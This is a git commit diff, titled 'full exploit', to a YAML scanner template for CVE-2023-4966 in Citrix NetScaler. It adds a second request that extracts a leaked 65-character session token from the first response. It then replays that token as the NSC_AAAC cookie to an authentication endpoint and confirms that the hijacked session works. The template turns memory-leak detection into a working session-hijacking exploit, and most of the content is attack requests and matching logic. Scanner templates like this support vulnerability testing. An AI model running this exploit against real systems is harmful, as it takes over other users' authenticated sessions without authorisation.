full exploit

2023-10-25 06:17:10 +05:30 · 2023-10-25 06:17:10 +05:30 · cdaa35cf93
parent b035ceffea
commit cdaa35cf93
1 changed files with 24 additions and 8 deletions
--- a/http/cves/2023/CVE-2023-4966.yaml
+++ b/http/cves/2023/CVE-2023-4966.yaml
@ -36,21 +36,37 @@ http:
        {{str}}: {{Hostname}}
        Host: {{payload}}

+      - |+
+        POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: NSC_AAAC={{session}}
+        User-Agent: python-requests/2.25.1
+        Accept-Encoding: gzip, deflate, br
+        Accept: */*
+        Connection: close
+        Content-Length: 0
+
+
    unsafe: true
+    extractors:
+      - type: regex
+        name: session
+        part: body_1
+        group: 1
+        regex:
+          - \b([a-f0-9]{65})\b
+        internal: true
+
    matchers-condition: and
    matchers:
      - type: word
-        part: body
+        part: body_1
        words:
-          - '{"issuer":'
          - 'NSC_AAAC='
+          - '{"issuer":'
        condition: and

      - type: word
-        part: header
+        part: header_2
        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
+          - "text/plain"